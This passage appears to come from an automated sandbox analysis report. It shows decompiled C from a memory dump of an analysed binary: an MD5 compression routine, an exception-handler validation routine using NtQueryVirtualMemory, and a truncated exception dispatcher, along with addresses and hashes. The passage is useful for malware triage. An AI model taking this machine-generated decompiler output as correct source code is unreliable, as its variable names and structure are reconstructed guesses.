				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x03c48371
0x03c4837c
0x03c4837f
0x03c48382
0x03c48383
0x03c483a1
0x03c483a3
0x03c483a6
0x03c483a9
0x03c483a9
0x03c483ac
0x03c483ac
0x03c483af
0x03c483af
0x03c483b2
0x03c483b2
0x03c483cf
0x03c483d2
0x03c483e8
0x03c483eb
0x03c48405
0x03c48408
0x03c4841e
0x03c48421
0x03c48423
0x03c4843b
0x03c4843e
0x03c48441
0x03c48459
0x03c4845c
0x03c48476
0x03c48479
0x03c4848f
0x03c48492
0x03c48494
0x03c484ac
0x03c484b1
0x03c484b4
0x03c484ca
0x03c484cd
0x03c484e7
0x03c484ea
0x03c48500
0x03c48503
0x03c48505
0x03c48520
0x03c48523
0x03c4853a
0x03c4853d
0x03c48541
0x03c4855a
0x03c4855d
0x03c4855f
0x03c48562
0x03c4857d
0x03c48580
0x03c48599
0x03c4859c
0x03c485ac
0x03c485af
0x03c485c7
0x03c485ca
0x03c485e4
0x03c485e7
0x03c485ff
0x03c48602
0x03c48618
0x03c4861b
0x03c48633
0x03c48636
0x03c4864e
0x03c48651
0x03c4866b
0x03c4866e
0x03c48684
0x03c48687
0x03c4869f
0x03c486a2
0x03c486bc
0x03c486bf
0x03c486d7
0x03c486da
0x03c486f0
0x03c486f3
0x03c4870b
0x03c4870e
0x03c48726
0x03c48729
0x03c4873b
0x03c4873e
0x03c48750
0x03c48753
0x03c48765
0x03c48768
0x03c4876c
0x03c4877c
0x03c4877f
0x03c4878d
0x03c48790
0x03c487a2
0x03c487a5
0x03c487b9
0x03c487bc
0x03c487be
0x03c487ce
0x03c487d1
0x03c487e3
0x03c487e6
0x03c487f4
0x03c487f7
0x03c48809
0x03c4880c
0x03c48810
0x03c48820
0x03c48823
0x03c48835
0x03c48838
0x03c48846
0x03c48849
0x03c4885b
0x03c4885e
0x03c48870
0x03c48873
0x03c48887
0x03c4888a
0x03c4889e
0x03c488a1
0x03c488b5
0x03c488b8
0x03c488cc
0x03c488cf
0x03c488e3
0x03c488e6
0x03c488fa
0x03c488ff
0x03c48911
0x03c48914
0x03c48928
0x03c4892b
0x03c4893f
0x03c48942
0x03c48958
0x03c4895b
0x03c4896f
0x03c48972
0x03c48984
0x03c48987
0x03c4899b
0x03c4899e
0x03c489b2
0x03c489b5
0x03c489c9
0x03c489d2
0x03c489d5
0x03c489de
0x03c489e7
0x03c489ef
0x03c489f7
0x03c48a01
0x03c48a16

APIs

memset.NTDLL ref: 03C48A0A

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
Instruction ID: 3b5d6a2e2c2222beef28764e3b27d3fc74c064cc892f0285354a940b9f6b6c2d
Opcode Fuzzy Hash: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
Instruction Fuzzy Hash: C222847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 03C4B1E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C4B1E5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x3c4d2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x3c4d328 = 1;
										__eflags =  *0x3c4d328;
										if( *0x3c4d328 != 0) {
											goto L60;
										}
										_t84 =  *0x3c4d2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x3c4d328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x3c4d2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x3c4d2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x3c4d2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x3c4d328 = 1;
							__eflags =  *0x3c4d328;
							if( *0x3c4d328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x3c4d328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x3c4d2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x3c4d2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x03c4b1ef
0x03c4b1f2
0x03c4b1f8
0x03c4b216
0x00000000
0x03c4b216
0x03c4b200
0x03c4b209
0x03c4b20f
0x03c4b21e
0x03c4b221
0x03c4b224
0x03c4b22e
0x03c4b22e
0x03c4b230
0x03c4b233
0x03c4b235
0x03c4b235
0x03c4b237
0x03c4b23a
0x00000000
0x00000000
0x03c4b23c
0x03c4b23e
0x03c4b2a4
0x03c4b2a4
0x03c4b402
0x00000000
0x03c4b402
0x03c4b240
0x03c4b240
0x03c4b244
0x03c4b246
0x03c4b246
0x03c4b246
0x03c4b246
0x03c4b249
0x03c4b24a
0x03c4b24d
0x03c4b24d
0x03c4b251
0x03c4b255
0x03c4b263
0x03c4b263
0x03c4b26b
0x03c4b271
0x03c4b273
0x03c4b275
0x03c4b285
0x03c4b292
0x03c4b296
0x03c4b29b
0x03c4b29d
0x03c4b31b
0x03c4b31b
0x03c4b29f
0x03c4b29f
0x03c4b29f
0x03c4b31d
0x03c4b31f
0x03c4b400
0x03c4b400
0x00000000
0x03c4b325
0x03c4b325
0x03c4b32c
0x00000000
0x00000000
0x03c4b332
0x03c4b336
0x03c4b392
0x03c4b394
0x03c4b39c
0x03c4b39e
0x03c4b3a0
0x00000000
0x00000000
0x03c4b3a2
0x03c4b3a8
0x03c4b3aa
0x03c4b3ac
0x03c4b3c1
0x03c4b3c1
0x03c4b3c3
0x03c4b3f2
0x03c4b3f9
0x00000000
0x03c4b3f9
0x03c4b3c7
0x03c4b3c8
0x03c4b3ca
0x03c4b3cc
0x03c4b3cc
0x03c4b3ce
0x03c4b3d0
0x03c4b3d2
0x03c4b3e6
0x03c4b3e6
0x03c4b3e9
0x03c4b3eb
0x03c4b3eb
0x03c4b3ec
0x03c4b3ec
0x00000000
0x03c4b3d4
0x03c4b3d4
0x03c4b3d4
0x03c4b3dd
0x03c4b3de
0x03c4b3e0
0x03c4b3e2
0x03c4b3e2
0x00000000
0x03c4b3d4
0x03c4b3d2
0x03c4b3ae
0x03c4b3b5
0x03c4b3b5
0x03c4b3b7
0x00000000
0x00000000
0x03c4b3b9
0x03c4b3ba
0x03c4b3bd
0x03c4b3bf
0x00000000
0x00000000
0x00000000
0x03c4b3bf
0x00000000
0x03c4b3b5
0x03c4b338
0x03c4b33b
0x03c4b340
0x00000000
0x00000000
0x03c4b349
0x03c4b34b
0x03c4b351
0x00000000
0x00000000
0x03c4b357
0x03c4b35d
0x00000000
0x00000000
0x03c4b363
0x03c4b365
0x03c4b36e
0x03c4b372
0x00000000
0x00000000
0x03c4b378
0x03c4b37b
0x03c4b37d
0x00000000
0x00000000
0x03c4b384
0x03c4b386
0x00000000
0x00000000
0x03c4b388
0x03c4b38c
0x00000000
0x00000000
0x00000000
0x03c4b38c
0x00000000
0x00000000
0x00000000
0x03c4b277
0x03c4b277
0x03c4b277
0x03c4b27e
0x00000000
0x00000000
0x03c4b280
0x03c4b281
0x03c4b283
0x00000000
0x00000000
0x00000000
0x03c4b283
0x03c4b2ab
0x03c4b2ad
0x00000000
0x00000000
0x03c4b2bd
0x03c4b2bf
0x03c4b2c1
0x00000000
0x00000000
0x03c4b2c7
0x03c4b2ce
0x03c4b2fa
0x03c4b2fa
0x03c4b2fc
0x03c4b2fe
0x03c4b312
0x03c4b314
0x00000000
0x00000000
0x00000000
0x00000000
0x03c4b300
0x03c4b300
0x03c4b300
0x03c4b309
0x03c4b30a
0x03c4b30c
0x03c4b30e
0x03c4b30e
0x00000000
0x03c4b300
0x03c4b2d0
0x03c4b2d0
0x03c4b2d3
0x03c4b2d5
0x03c4b2e7
0x03c4b2e7
0x03c4b2ea
0x03c4b2ec
0x03c4b2ec
0x03c4b2ed
0x03c4b2ed
0x03c4b2f3
0x03c4b2f3
0x00000000
0x00000000
0x00000000
0x00000000
0x03c4b2d7
0x03c4b2d7
0x03c4b2d7
0x03c4b2de
0x00000000
0x00000000
0x03c4b2e0
0x03c4b2e0
0x03c4b2e1
0x00000000
0x00000000
0x00000000
0x03c4b2e1
0x03c4b2e3
0x03c4b2e5
0x03c4b2f8
0x00000000
0x00000000
0x00000000
0x03c4b2f8
0x00000000
0x03c4b2e5
0x03c4b257
0x03c4b25a
0x03c4b25d
0x00000000
0x00000000
0x03c4b25f
0x03c4b261
0x00000000
0x00000000
0x00000000
0x03c4b261
0x03c4b226
0x03c4b228
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 03C4B296

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: cf9b73e33d9f15dd5867cd1a27803a0c311679eeb38dba23359ef51096c8027e
Instruction ID: 47eb892b6f11ca525b884f763dda944f803030f767654608e768b8fc9a0a13c2
Opcode Fuzzy Hash: cf9b73e33d9f15dd5867cd1a27803a0c311679eeb38dba23359ef51096c8027e
Instruction Fuzzy Hash: 8D61C531A006069FDB39DA2ED89472DB3B5EB85314F288569D8D6CB685E770EE42C680

Uniqueness

Uniqueness Score: -1.00%

Function 03C4AFC0, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E03C4AFC0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E03C4B12B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E03C4B1E5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E03C4B0D0(_t55, _t66);
